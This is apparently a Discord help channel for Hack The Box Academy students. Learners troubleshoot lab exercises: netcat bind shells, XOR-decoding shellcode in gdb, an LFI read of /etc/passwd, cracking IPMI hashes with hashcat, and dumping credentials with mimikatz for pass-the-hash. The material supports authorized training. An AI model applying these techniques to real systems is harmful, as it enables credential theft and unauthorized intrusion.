You weren't helpful at any point, Xre0us was. Stop following up like you did good here. You were just standoffish, that was it.

what for

weird

Marcie, I tried that again and just get "nc: Permission denied" lol

Just wanted to ask a couple questions about CPTS if you could answer was all

I don’t really like pineapples; they hurt my teeth.

whatever dude

Maybe with the recent updste it got fixed. But ngl search on mobile since the last big update about that it just went downhill

glad your issue is resolved

mobile is always an L

most questions that can be asked have been answered in #cpts

Oh alright cool thanks... Figured cause I saw the role I would ask but if there's a channel that answers questions etc that's even better

yeah feel free to ask over there

Hey, I'm struggling with the Abusing HTTP Misconfigurations HARD skill assessment. Can someone please DM me for help? Thank you.

it just depends on the question, if it's a broad question that's not about the content 👍
if it's a question re: specifics 👎

ah alright gotcha

and I don't know if you saw my reponse, but tried again and just get "nc: Permission denied"

i did; it sounds like nc doesn't have the right perms

try setting a higher port to connect to

4444/9999/42069

weird, I tried 4444 originally, let me try again

bingo, not sure what happened but I'm good now, sorry to bug you

np

sometimes it's a case of "I did nothing different and now it works? ???????

yeah, the first time I did 4444 it just said tcp connection successful but got no shell... tried a diff port and got the perm denied, tried 4444 again and we're good

could've been an error I did idk, but it worked lol

And I assume if I disconnect from the bind shell, I would then have to run the syntax again on the target to re-open the shell?

idr

alright no worries, thanks for the help though, I'm off to bed, goodnight!

is it just me or do a lot of the questions in htb modules require information from modules you haven't done yet

ya im trying to download a .exe from my machine to the target and I get a 200 on my machine but it never downloads to the target

windows doesn't like when you don't use -OutFile or whatever it is in Powershell

nothing works isn't particularly descriptive, if you're on the free plan and using the pwnbox then you're gonna be restricted on the internet

i'm on a student plan and i'm not even using the pwnbox i'm just using a terminal

Hi i have a question

also i'm not looking for help with the question i just want to know if i'm the only one

ok ill look into that thanks

do any of you know how to de code messages?

could you be more specific

you mean like this💀 SW4gdGh1IhdvcmxkJ3Mgy29yzswgysbnbG10Y2ggdW5mdXJscywKU3B1YwsgbxkgbmFtZswgdGh1iG9uZsb1bnNhaWqsCkfuzcbmcm9tihrozsb2b2iklcbjihnoywxsigj1igx1zc4kq29sbgvjdcbtzswgyw5kihnoyxjoihroaxmgd29yb29ybgqncybmywxslg==

it's base64

wth is that😭

wha???

whats base64

srry im new to de coding stuff

what does this have to do with htb modules

idk im just trying to find out wth is says😭

i dont even know what this servers for

why are you asking in this server in this channel

bc i cant talk in gen

this is a channel dedicated to questions about the academy, a place for education.. not random stuff like that

then why the fuck are you in it and why are you asking here

BC IDK WHERE TOO

try /r/masterhacker

don't

ye im not

so do you have any idea how to solve my mess?

no one here can help you with that, we've said that in other ways

where did you get it from? it decodes to a bunch of non unicode characters

it looks like it's supposed to be a poem but half of it is unknown characters

it was given to me to try and de code first person to gets something

this is the wrong server

it's base64

there have fun

so what is the codd you found?

omfg man

the code is: go away

i would say take the hint but i've literally told you directly to go away

read and follow #welcome

ok this is absolutely killing me

what is

break down the commands one by one; add each | one at a time until you see why it's not working

ah

the curl inlanefreight.com and find unique paths

i'm not asking for help with the problem, all i'm asking is if it's just me

to be fair that question is a bit out of the left field

this module doesn't even cover curl

well if you break down the command, you'll see where it's breakin

that's still not what i'm asking

it sort of does, but curl is also just a basic linux command

like yes the linux module is out of order imo

good to know, thank you

but not much that can't be googled or read ahead and circle back

might do web requests and/or intro to networking before this one since i'm on the infosec foundations path

i mean i've gone as far as to google the actual question and i've found three completely different answers, none of which were correct

so i'm just going to read ahead

try chatgpt

well if none of the results are correct; then I suggest breaking down where it's breaking down to try and figure out what breaks and where

chatgpt is worthless

if it's giving you no answer or too high/low

its only as good as its user

i asked it a basic question about tr the other day and it kept giving me some completely made up answers

my suggestion was moreso: you said "not working" earlier

it's most defenintley not lol, you just have ask the right questions

the curl question is a bit unfair but it's asking you to chain commands together using the pipe operator

https://www.geeksforgeeks.org/curl-command-in-linux-with-examples/

tr is used in a lot of things; tr can be used in html

and is a linux command

hold on let me find it

it can only pull so much

nvm it's gone

but it kept trying to tell me the ascii value for - is between N and M or something completely wrong like that

and every time i corrected it it just gave me a different completely wrong answer

works for me

is it between N and M

no it's not

it's nowhere near the latin alphabet, which starts at 65 iirc

what

sounds like you asked it a bad question

i guess since the courses don't work, google doesn't work, and chatgpt doesn't work, you'll never learn about curl.

symbols are before the alphabet

that's what i just said, dash is 45 and the alphabet starts at 65 but chatgpt kept trying to tell me that dash is in the middle of the alphabet

did you read the question that i asked in the first place

why does everyone on discord constantly misinterpret, ignore, or selectively read every fucking question i ask

my original question had nothing to do with curl, all i wanted to know is if i was right about htb module questions containing information from future modules

completely ignore the part about curl, pretend i never even mentioned curl

the answer is: no. i have never seen a module not teach you how to complete it. some of them have requirements of certain knowledge before you'll be able to comfortably go through the module, for example it may expect you to know basic linux commands like "dir" and "curl"

if "everyone" does it, maybe you're bad at asking specific question to get the answer you want

and relax, being mad at other people won't help you get better answers or make people want to answer them

idk how much better at asking questions i could possibly get when i ask stuff like "which of the two is better, x or y" and every fuckin person answers something other than x or y

Late to the party, but to answer your original question @loud dagger, I found the same specifically to that exercise. I found I had to lean on prior Linux knowledge to answer it. I then scrolled back through the module to make sure I hadn’t just missed it, but couldn’t see it there. And then I would have been able to piece the answer together with stuff that came later on.

thank you

using one of the commands i found in the forums gave me the expected answer

so idk how you're not getting the expected answer

would you pretty pretty please ignore the other messages i sent; they have nothing to do with my original question, all i was doing was giving an example

they're gone, i deleted them, they were just an example

cool

joe answered my question, thank you joe

¯_(ツ)_/¯

gl with the rest

thank you

i'm just commenting on the fact that in your original post you said you used a handful and didn't get the right answer. I apologize for dragging it out further than that

unbelievable

yes, you'll eventually need all the things you learn for the last module on the path

I'm still totally stuck on Intro to Assembly Language Skill Assessment.

I don't understand what the question want's as an answer. Am I looking for a flag???

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

the elf program contains a shellcode which has been xor'd, your task is to decrypt the shellcode and run it to get the flag, to do that, you'll need to disassemble the binary and reverse the encryption with the xor key found inside

I have xord every single stack value against the key in search of something that looks meaningful. I dont see anything that looks like a flag.

because it's shellcode, after you xor it, run it with the shellcode loader to get the flag

is the answer an address?? an HTB{flag} I just don't even know what we're looking for for an answer here at this point

it's a normal flag, you'll know when you see it

disassembling and writing shellcode, fun times

I loaded it in the loader.py and got nothing. I have no idea what I'm doing wrong

I'm really trying everything here. I just went so far as to try changing the endianess of every hex value.

hello may i have some help with the lfi module

there's no need for that, send a screenshot of your gdb and tell me where you're getting the value

you'll need to get verified to post images, read #welcome

stuck at the basic bypasses question, even tho i was able to get the /etc/passwd , when i change it to /usr/share/flags/flag.txt i get nothing

am i missing something or is the flag path incorrect ?

did the question tell you to look for flag.txt specifically?

so why /usr/share/flags/flag.txt instead of /flag.txt

i did try that and still no results, also the usr share flags was the path from the previous question

actually nvm i tried again and it worked now?

thanks!!

you were giving me a heart attack

I've gone through it about 12 times. My method has changed slightly each time, but the most recent run through was...

./shellcoder.sh loaded_shellcode
gdb ./loaded_shellcode
break *0x0000000000401000
run
x/16gx $rsp
info registers rbx
set $rbx=0x2144d2144d2144d2
python print("0x%x" % (0x[every address] ^ 0x2144d2144d2144d2))

Get array of 14? hex values.

Concatenated all hex values.

python loader.py '[that concatenated value]'

Then I tried reversing the endianness of every one of those hex values before concatenating them. and running the loader.py again, but it didn't yield anything.

lab down?

Hi guys

Can anyone help me out with netcat

did you xor it?

Just ask your question and usually someone will reply

python print("0x%x" % (0x[every address] ^ 0x2144d2144d2144d2)) is where I xord every address against the key

the question asked you to use assembly to xor it, not sure why you're using python

and did you follow my hint and the hint in the question

also, you're xor'ing the address? you'll need to xor the value that was pushed into the stack, instead of the address

Ohhhh kay I am mad. I don't know what I did wrong.

One of my xor's produced a result that had 15 instead of 16 characters. I found a forum post where someone had the same problem https://forum.hackthebox.com/t/htb-academy-intro-to-assembly-language-skills-assessment-task-1/4164/30

Not sure what both of us did wrong to get that

but my list of xor'd stack addresses against the xor key produced one that was missing a leading 0.

adding the 0 produced the flag.

I truly hope I did something wrong. Because I'm.... not happy.

😦 anyways. I got it. Thanks for your help @next bronze

anyone having a difficult time spawing their target?

Try changing VPN?

Same as above

got it, thanks

Can someone suggest me a good resource for the computer networking?

why cant i dump hash with mimikatz? ive tried sam cache and all possible lsadump command

in section Pass the Hash (PtH)

I’m still lost in HTB footprinting with hashcat

My hashcat status is EXHAUSTED

What am I supposed to do.

what section of footprinting is hashcat

In ipmi

The last question “what is the cleartext account password

My commands are “hashcat -a 0 -m 100 hashes.txt /usr/share/wordlists/rockyou.txt

Did you try the passwd list that the module says to use, ipmi_passwords.txt?

To be Honest nope

Let me try

yeah if it's exhausted that means it went through the whole list and found no matches

What mimi commands?

so another wordlist is good to try

I use that one and says EXHAUSTED

lsadump::sam

i haven't done that module so i can't really comment, not sure. exhausted simply means no password matched though.

ive nt acc and i run mimi as admin already

use rockyou

I’m doing it , but say’s exhausted

wrong mode

ipmi right

Yes

Using mode 100 and I already try with mode 7300

would hashcat return exhuasted if the hash was incompatible with the mode though?

i thought it errored out

I do not think so, and I’m sure that the mode I need to use is the 100

it's not 100

7300, given in the module

With 7300 is not giving anything

Wooooowwwww I got it

Yesssssssss

🤣🤣🤣🤣🤣 FINALLY AFTER TWO DAYS

That's not correct,you'll want to use a completely different command and make sure you elevate your token

ermmmm

Been trying to think of a hint without just fully giving it away

are you supposed to dump sam or

My notes say password

yes is able to dump secrets using the elevated token method

but i cant dump the hash, imagine i got the clear txt password but not hash

but we don't know which module is it

oh nvm I'm blind

how to dump hash lol, i tried lsadump:sam but it gave me other user hash

or should i just switch the plaintext pw to hash myself

this apex legends drama is wild

Has anyone else had issues with ZAP not replacing strings in the Web Proxy module? Burp seems to be working fine when using match&replace.

NT/rc4 off a full login from mimi will do it

||sekurlsa::|| is the first part

oh i use mimikatz to pth to the victim machine?

oh it's that one

check attacking lsass section

do you already have the hash?

i see i thought ill need to login to the windows in order to run mimikatz

nope will try that method from gubarz later having class now

thanks all

yeah you'll need to get the hash before you can pass it

need some insight on https://academy.hackthebox.com/module/143/section/1265

I scan or capturing traffic with wireshark, it's asking for info on the target 172.16.5.5.. im simply not getting any connections there.. i do see that IP when I run fping

did you ssh into the target

yes im connected right now

i see a lot of traffic to 172.16.5.130 but not 5.5

you know how to filter by a specific ip in wireshark?

yeah ip.addr = = 172.16.5.5

if i ping the 5.5 i generate the traffic but its icmp it doesnt recover the common name

im guessing this isnt working as expected?

if you're trying to get the CN, you can use other tools

dig?

the most common scanning tool, it's also in the section

gotcha.. running that. I wish the wireshark thing worked.. unless its not meant to and eventually you need to run the scan

maybe the lab just doesn't have ARP request from DC, the lab is not always the exact same as the section

also yes I don't think you'll get the CN from the wireshark capture

This is a follow along section, you'll see they use fping to get a list of IPs which then you can use the next tool to get more information

while i was running the nmap scan, i dont know it triggered something or just coincidence but i did eventually get 1 piece of info from wire shark, protocol is "BROWSER" and in the info it says "Host Announcement ..." and it does the first part of the CN but not domain.

anyways, thanks guys i was able to complete the module

module?

me? i was working on https://academy.hackthebox.com/module/143/section/1265

Shush you! I meant section 😦

why am I not able to speak on other channels ?

specially #general

somebody help

you need to verify your acc.

the instructions are here https://discord.com/channels/473760315293696010/477042232109826048

The part about Wireshark was to explain that you can gather some information over the wire and it's a great tool for sniffing, but it's not applicable in all situations.

understood, i think i prefere responder between the three shown, although i should use wireshark more since i have to use it at work

wait, how do I trust the link ?

how do I trust hackthebox ?

with my master password

I mean all are hackers here, I could be hacked

reach out to support

@soft cedar

true, you don't have to get verified

means ?

reach out to support on the website

well what exactly would they do

or scroll your lazy ass up in discord yourself

By mistake I set my country as Afghanistan

it was set as default.

what do I do now ?

bruh not able to verify, someone please gimme access

I want to learn reverse engineering, bug, kernel exploiting, privilidge escalation and dll injecting through process hacker asap

Guys who solved the perfection machine

vpn